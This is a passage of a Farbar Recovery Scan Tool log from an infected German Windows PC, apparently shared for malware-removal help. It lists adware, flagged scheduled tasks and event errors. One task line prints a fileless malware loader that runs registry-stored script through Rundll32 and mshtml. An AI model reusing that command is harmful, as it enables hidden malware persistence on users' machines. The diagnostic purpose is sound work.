2014-12-05 21:19 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-12-05 21:10 - 2014-06-08 13:02 - 00037648 _____ () C:\Windows\PFRO.log
2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic
2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung
2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia
2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe
2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google
2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google
2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394
2014-11-13 14:25 - 2014-10-16 07:42 - 00000000 ____D () C:\Program Files\CouponArific
2014-11-13 14:25 - 2014-10-16 07:42 - 00000000 ____D () C:\Program Files\35556262-902E-49AE-8622-66E14F1F041C
2014-11-13 14:25 - 2013-10-26 18:28 - 00000000 ____D () C:\Program Files\WiseConvert_1.3_B2
2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache
2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk
2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE
2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG
2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini
2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp
2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin
2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe

Files to move or delete:
====================
C:\Users\finja\remove.exe


Some content of TEMP:
====================
C:\Users\finja\AppData\Local\Temp\Quarantine.exe
C:\Users\finja\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-12-05 21:52

==================== End Of Log ============================

Addition:
Code:
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 03-12-2014
Ran by finja at 2014-12-06 09:22:25
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version:  - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version:  - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version:  - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version:  - Oberon Media)
Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version:  - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version:  - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version:  - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version:  - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version:  - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version:  - )
LightScribe  1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version:  - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version:  - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version:  - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version:  - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version:  - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll (Microsoft Corporation)

==================== Restore Points  =========================

05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1045E6B6-E707-475F-97CD-571E06C36511} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-4 No Task File <==== ATTENTION
Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {12725841-0DB7-461B-94D5-8A90F6589009} - System32\Tasks\GoogleUpdater => Rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write((new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\internet explorer\\zergling_rush"))
Task: {1EB9CADD-2506-46E7-96AD-5CBB99CAD30C} - \9038396b-6856-4ead-9ee7-1215f651f0aa No Task File <==== ATTENTION
Task: {26928486-85D4-43D1-846F-D5189AE90D56} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-1 No Task File <==== ATTENTION
Task: {33B6F316-29F5-4DEA-A8CC-B9249563A4AB} - \04b071f9-0b45-4ff0-af73-073c440df543-11 No Task File <==== ATTENTION
Task: {3738576E-1797-480B-AB26-9BECD9BC9AB1} - \04b071f9-0b45-4ff0-af73-073c440df543-4 No Task File <==== ATTENTION
Task: {4BF96ACD-C54D-472D-BD3D-8C4495786051} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5_user No Task File <==== ATTENTION
Task: {50B6DF40-8A74-4768-B9E7-44B068036A93} - \04b071f9-0b45-4ff0-af73-073c440df543-3 No Task File <==== ATTENTION
Task: {521C87B6-4ECD-45FA-A21F-0987123DD4C6} - \afbfdcf4-7553-4735-ab81-4373cca9a051-6 No Task File <==== ATTENTION
Task: {547E6824-355F-4AC3-8FBC-7E4FBF25D3EF} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5 No Task File <==== ATTENTION
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {665589FE-FED9-450D-8CAC-BCD6A34E666E} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-2 No Task File <==== ATTENTION
Task: {6ED78F91-0AE2-43BA-8C76-47269CF7A210} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-2 No Task File <==== ATTENTION
Task: {793BBF80-2488-4871-8D11-6A461B28C8DE} - System32\Tasks\MQZDOUD => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: {7BC36AEC-816F-4BC2-93E6-9836D38AAD73} - \04b071f9-0b45-4ff0-af73-073c440df543-1 No Task File <==== ATTENTION
Task: {88A4BAC1-045F-4DEC-B932-AEFCD853FCBB} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-11 No Task File <==== ATTENTION
Task: {8C6325F8-822B-4446-8F5E-79B27AA3A5D0} - \04b071f9-0b45-4ff0-af73-073c440df543-5_user No Task File <==== ATTENTION
Task: {928B2F3B-2C64-4AED-9F1B-93315F01FBDC} - \afbfdcf4-7553-4735-ab81-4373cca9a051-7 No Task File <==== ATTENTION
Task: {99F31AC3-75A5-427A-A9A1-F7B67F954F82} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-1 No Task File <==== ATTENTION
Task: {A983A371-8E43-4C81-AB3D-1793E6C729DD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-5_user No Task File <==== ATTENTION
Task: {ADB99999-9CE5-4C49-8F93-40086B7A25B0} - \afbfdcf4-7553-4735-ab81-4373cca9a051-11 No Task File <==== ATTENTION
Task: {B07D5064-3E65-4825-82D2-D8ABAFA800DB} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-4 No Task File <==== ATTENTION
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)
Task: {B30E872D-50B8-4BC9-97FA-EE9C0D46B1D1} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)
Task: {B31760E5-4C25-4B17-AA41-19EBAB4B5530} - System32\Tasks\XPGILDE => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION
Task: {CD87FD16-CBAA-439E-97ED-F35F08A43569} - \4d0ec2e7-584d-427b-a601-b9b87a4eb405-5 No Task File <==== ATTENTION
Task: {D577D774-768A-41F6-807D-4B88E2B8F71A} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-3 No Task File <==== ATTENTION
Task: {E911148E-9670-41D8-BAE6-AB49D00F4C5E} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-11 No Task File <==== ATTENTION
Task: {EAA78C2F-DE4A-448D-B187-69456B16B48A} - \04b071f9-0b45-4ff0-af73-073c440df543-5 No Task File <==== ATTENTION
Task: {F5A45096-AF42-4D57-AAD9-D9BDE4DCFFCD} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-7 No Task File <==== ATTENTION
Task: {F6739869-2927-42C5-B8E3-6A24E4A7A5A4} - \04b071f9-0b45-4ff0-af73-073c440df543-2 No Task File <==== ATTENTION
Task: {FB314ECF-96F0-41DC-8CC2-C2561140CB57} - \01ce284f-8b14-4b5a-ac9a-14ba09efbf4d-6 No Task File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\MQZDOUD.job => C:\Users\finja\AppData\Roaming\MQZDOUD.exe <==== ATTENTION
Task: C:\Windows\Tasks\XPGILDE.job => C:\Users\finja\AppData\Roaming\XPGILDE.exe <==== ATTENTION

==================== Loaded Modules (whitelisted) =============

2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\ProgramData\TEMP:9E22BBE8

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (12/05/2014 09:43:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/05/2014 09:15:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung explorer.exe, Version 6.0.6002.18005, Zeitstempel 0x49e01da5, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x00aab3d6,
Prozess-ID 0xb50, Anwendungsstartzeit explorer.exe0.

Error: (12/05/2014 09:13:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung Reader_sl.exe, Version 10.1.12.15, Zeitstempel 0x54083e61, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xf1c, Anwendungsstartzeit Reader_sl.exe0.

Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung ehtray.exe, Version 6.0.6001.18000, Zeitstempel 0x4791938f, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xf24, Anwendungsstartzeit ehtray.exe0.

Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung msseces.exe, Version 4.6.305.0, Zeitstempel 0x53f79c0e, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xeb0, Anwendungsstartzeit msseces.exe0.

Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung igfxpers.exe, Version 8.15.10.2202, Zeitstempel 0x4c756824, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xe88, Anwendungsstartzeit igfxpers.exe0.

Error: (12/05/2014 09:13:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlerhafte Anwendung igfxtray.exe, Version 8.15.10.2202, Zeitstempel 0x4c75683c, fehlerhaftes Modul unknown, Version 0.0.0.0, Zeitstempel 0x00000000, Ausnahmecode 0xc0000005, Fehleroffset 0x8bfc7d8b,
Prozess-ID 0xe4c, Anwendungsstartzeit igfxtray.exe0.

Error: (12/05/2014 09:12:31 PM) (Source: WinMgmt) (EventID: 10) (User: )
